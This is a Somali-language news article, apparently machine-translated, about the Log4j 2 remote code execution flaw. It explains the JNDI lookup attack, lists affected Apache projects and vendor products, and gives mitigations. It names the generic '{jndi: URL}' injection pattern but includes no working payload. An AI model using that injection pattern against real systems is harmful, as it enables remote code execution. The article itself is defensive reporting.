Ilaa 17 mashruuc oo Apache ah ayaa waxaa saameeya nuglaanta Log4j 2

Darkcrizt

Daqiiqado 4

log4j

Inta lagu jiro maalmaha ugu dambeeya Shabakadda waxaa aad looga hadal hayaa baylahda Log4j kaas oo laga helay weerrar kala duwan iyo faa'iidooyin kala duwan oo shaqayn kara sidoo kale la sifeeyay si looga faa'iidaysto nuglaanta.

Muhiimadda arrintu waa in tani ay tahay qaab-dhismeedka caanka ah ee abaabulka diiwaangelinta ee codsiyada Java., kaas oo u ogolaanaya kood aan sabab lahayn in la fuliyo marka qiimo si gaar ah loo habeeyey loogu qoro diiwaanka qaabka "{jndi: URL}". Weerarka waxaa lagu qaadi karaa codsiyada Java kuwaas oo diiwaan geliya qiyamka laga helay ilo dibadda ah, tusaale ahaan iyadoo la soo bandhigayo qiyamka dhibaatada leh ee fariimaha qaladka ah.

Waa sidaas Weeraryahanku wuxuu codsi HTTP ka sameeyaa nidaamka bartilmaameedka, kaas oo soo saara log isticmaalaya Log4j 2 Kaas oo isticmaala JNDI si uu codsi ugu gudbiyo goobta uu gacanta ku hayo weerarka. Nuglaanta ayaa markaa keenta in habka laga faa'iidaysto uu yimaado goobta oo uu fuliyo culayska lacagta. Weeraro badan oo la arkay, halbeegga uu leeyahay qofka weerarka geystay waa nidaamka diiwaangelinta DNS, oo loogu talagalay in lagu diiwaangeliyo codsi goobta si loo aqoonsado nidaamyada nugul.

Sida saaxiibkeen Isxaaq uu horeba u wadaagay:

Nuglaanta Log4j waxay ogolaataa in laga faa'iidaysto ansaxinta galitaanka khaldan ee LDAP, taas oo u ogolaanaysa fulinta code fog (RCE), iyo wax u dhimaya adeegaha (qarsoodi, daacadnimada xogta iyo helitaanka nidaamka). Intaa waxaa dheer, dhibaatada ama muhiimada nuglaanshahani waxay ku jirtaa tirada codsiyada iyo adeegayaasha isticmaala, oo ay ku jiraan software ganacsi iyo adeegyada daruuraha sida Apple iCloud, Steam, ama ciyaaraha caanka ah ee caanka ah sida Minecraft: Java Edition, Twitter, Cloudflare, Tencent, ElasticSearch, Redis, Elastic Logstash, iyo iwm dheer.

Isagoo arrintaa ka hadlayana, dhawaan Apache Software Foundation ayaa la sii daayay iyada oo loo marayo boostada Mashruucyo kooban oo ka hadlaya nuglaanshaha halista ah ee Log4j 2 kaas oo u ogolaanaya code aan sabab lahayn inuu ku shaqeeyo serverka.

Mashruucyada Apache ee soo socda ayaa saameeya: Archiva, Druid, EventMesh, Flink, Fortress, Geode, Hive, JMeter, Jena, JSPWiki, OFBiz, Ozone, SkyWalking, Solr, Struts, TrafficControl, iyo Calcite Avatica. Nuglaanta ayaa sidoo kale saamaysay alaabta GitHub, oo ay ku jiraan GitHub.com, GitHub Enterprise Cloud, iyo GitHub Enterprise Server.

Maalmihii u dambeeyay waxaa aad u kordhay ee hawlaha la xidhiidha ka faa'iidaysiga nugul. Tusaale ahaan, Check Point waxa ay gashay ku dhawaad ​​100 isku day oo ka faa'iidaysi daqiiqadiiba serferkeeda khiyaaliga ah heerkeeda ugu sarreysa, iyo Sophos wuxuu ku dhawaaqay daahfurka botnet-ka macdanta cusub ee cryptocurrency, oo laga sameeyay nidaamyada leh nuglaanshaha aan la daboolin ee Log4j 2.

Marka la eego xogta laga sii daayay dhibaatada:

  • Nuglaanta ayaa lagu xaqiijiyay sawirro badan oo Docker oo rasmi ah, oo ay ku jiraan fadhiga fadhiga, elasticsearch, flink, solr, sawirada duufaanka, iwm.
  • Nuglaanta waxay ku jirtaa sheyga Raadinta MongoDB Atlas.
  • Dhibaatadu waxay ka muuqataa badeecado kala duwan oo Cisco ah, oo ay ku jiraan Cisco Webex Meetings Server, Cisco CX Cloud Agent, Cisco
  • Warbixinta Amniga Shabakadda Sare, Cisco Firepower Threat Defense (FTD), Cisco Identity Services Engine (ISE), Cisco CloudCenter, Cisco DNA Center, Cisco. BroadWorks, iwm.
  • Dhibaatadu waxay ka jirtaa IBM WebSphere Application Server iyo alaabta Koofiyada Cas ee soo socota: OpenShift, OpenShift Logging, OpenStack Platform, Isdhexgalka Geel, CodeReady Studio, Data Grid, Fuse, iyo AMQ Streams.
  • Arrin la xaqiijiyay oo ku jira Platform Maareynta Shabakadda Hawada ee Junos, Northstar Controller / Planner, Paragon Insights / Pathfinder/ Planner.
  • Alaabooyin badan oo ka yimid Oracle, vmWare, Broadcom, iyo Amazon ayaa sidoo kale la saameeyay.

Mashruucyada Apache ee aysan saameynaynin nuglaanta Log4j 2: Apache Iceberg, Guacamole, Hadoop, Log4Net, Spark, Tomcat, ZooKeeper, iyo CloudStack.

Isticmaalayaasha xirmooyinka dhibaatada leh waxaa lagula talinayaa inay si degdeg ah u rakibaan cusbooneysiinta la sii daayay iyaga, si gooni gooni ah u cusboonaysii nooca Log4j 2 ama u deji halbeegga Log4j2.formatMsgNoLookups si run ah (tusaale, ku darida furaha "-DLog4j2.formatMsgNoLookup = Run" bilowga).

Si loo xiro nidaamka ayaa u nugul taas oo aan si toos ah loo helin, waxaa la soo jeediyay in laga faa'iidaysto tallaalka Logout4Shell, kaas oo, iyada oo loo marayo guddiga weerarka, soo bandhigaya goobta Java "log4j2.formatMsgNoLookups = run", "com.sun.jndi .rmi.wax. trustURLCodebase = been "iyo" com.sun.jndi.cosnaming.object.trustURLCodebase = been "si loo xakameeyo muujinta kale ee nuglaanshaha hababka aan la xakameynin.


Ka tag faalladaada

cinwaanka email aan la daabacin doonaa. Beeraha loo baahan yahay waxaa lagu calaamadeeyay la *

*

*

  1. Ka mas'uul ah xogta: AB Internet Networks 2008 SL
  2. Ujeedada xogta: Xakamaynta SPAM, maaraynta faallooyinka.
  3. Sharci: Oggolaanshahaaga
  4. Isgaarsiinta xogta: Xogta looma gudbin doono dhinacyada saddexaad marka laga reebo waajibaadka sharciga ah.
  5. Kaydinta xogta: Macluumaadka ay martigelisay Shabakadaha Occentus (EU)
  6. Xuquuqda: Waqti kasta oo aad xadidi karto, soo ceshan karto oo tirtiri karto macluumaadkaaga.